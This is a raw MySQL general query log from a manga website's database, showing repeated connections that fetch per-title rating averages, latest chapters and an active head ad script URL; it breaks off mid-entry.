u317079482_mangacherri_2 using Socket 330648695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648694 Quit 330648695 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648695 Quit 330648696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648689 Quit 330648697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648696 Quit 330648698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648697 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648697 Quit 330648698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330648698 Quit 330648699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648699 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330648699 Quit 330648700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330648700 Quit 330648701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648701 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330648701 Quit 330648702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330648702 Quit 330648703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648703 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330648703 Quit 330648704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330648704 Quit 330648705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648705 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330648705 Quit 330648706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330648706 Quit 330648707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648707 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 330648707 Quit 330648708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330648708 Quit 330648709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648709 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330648709 Quit 330648710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330648710 Quit 330648711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648711 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330648711 Quit 330648712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330648712 Quit 330648713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648713 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 330648713 Quit 330648714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330648714 Quit 330648715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648715 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330648715 Quit 330648716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330648716 Quit 330648717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648717 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 260225 19:28:58 330648717 Quit 330648718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330648718 Quit 330648719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648719 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330648719 Quit 330648720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330648720 Quit 330648721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648721 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330648721 Quit 330648722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330648722 Quit 330648723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648723 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330648723 Quit 330648724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330648724 Quit 330648725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648725 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330648725 Quit 330648726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330648726 Quit 330648727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648727 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330648727 Quit 330648728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330648728 Quit 330648729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648729 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330648729 Quit 330648730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330648730 Quit 330648731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648731 Query select * FROM chapters where manga_id = '240' order by created desc limit 1 330648731 Quit 330648732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330648732 Quit 330648733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648733 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330648733 Quit 330648734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330648734 Quit 330648735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648735 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330648735 Quit 330648736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330648736 Quit 330648737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648737 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330648737 Quit 330648738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330648738 Quit 330648739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648739 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330648739 Quit 330648740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330648740 Quit 330648741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330648741 Quit 330648742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330648742 Quit 330648743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330648743 Quit 330648744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330648744 Quit 330648745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330648745 Quit 330648746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330648746 Quit 330648747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330648747 Quit 330648748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330648748 Quit 330648749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330648749 Quit 330648750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330648750 Quit 330648751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330648751 Quit 330648752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330648752 Quit 330648753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330648753 Quit 330648754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330648754 Quit 330648755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330648755 Quit 330648756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330648756 Quit 330648757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330648757 Quit 330648758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330648758 Quit 330648759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330648759 Quit 330648760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330648760 Quit 330648761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330648761 Quit 330648762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330648762 Quit 330648763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330648763 Quit 330648764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330648764 Quit 330648765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330648765 Quit 330648766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330648766 Quit 330648767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330648767 Quit 330648768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330648768 Quit 330648769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330648769 Quit 330648770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330648770 Quit 330648771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330648771 Quit 330648772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330648772 Quit 330648773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330648773 Quit 330648774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330648774 Quit 330648775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330648775 Quit 330648776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330648776 Quit 330648777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330648777 Quit 330648778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330648778 Quit 330648779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330648779 Quit 330648780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330648780 Quit 330648781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330648781 Quit 330648782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330648782 Quit 330648783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330648783 Quit 330648784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330648784 Quit 330648785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330648785 Quit 330648786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330648786 Quit 330648787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330648787 Quit 330648788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330648788 Quit 330648789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330648789 Quit 330648790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330648790 Quit 330648791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330648791 Quit 330648792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330648792 Quit 330648793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330648793 Quit 330648794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330648794 Quit 330648795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330648795 Quit 330648796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330648796 Quit 330648797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330648797 Quit 330648798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330648798 Quit 330648799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330648799 Quit 330648800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330648800 Quit 330648801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330648801 Quit 330648802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330648802 Quit 330648803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330648803 Quit 330648804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330648804 Quit 330648805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330648805 Quit 330648806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330648806 Quit 330648807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330648807 Quit 330648808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330648808 Quit 330648809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330648809 Quit 330648810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330648810 Quit 330648811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330648811 Quit 330648812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330648812 Quit 330648813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330648813 Quit 330648814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330648814 Quit 330648815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330648815 Quit 330648816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330648816 Quit 330648817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330648817 Quit 330648818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330648818 Quit 330648819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330648819 Quit 330648820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330648820 Quit 330648821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330648821 Quit 330648822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330648822 Quit 330648823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330648823 Quit 330648824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330648824 Quit 330648825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330648826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648825 Quit 330648826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330648826 Quit 330648827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330648827 Quit 330648828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330648828 Quit 330648829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330648829 Quit 330648830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330648830 Quit 330648831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330648831 Quit 330648832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330648832 Quit 330648833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330648833 Quit 330648834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330648834 Quit 330648835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330648835 Quit 330648836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330648836 Quit 330648837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330648837 Quit 330648838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330648838 Quit 330648839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330648839 Quit 330648840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330648840 Quit 330648841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330648841 Quit 330648842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330648842 Quit 330648843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330648843 Quit 330648844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330648844 Quit 330648845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330648845 Quit 330648846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330648846 Quit 330648847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330648847 Quit 330648848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330648848 Quit 330648849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330648849 Quit 330648850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330648850 Quit 330648851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330648851 Quit 330648852 Connect 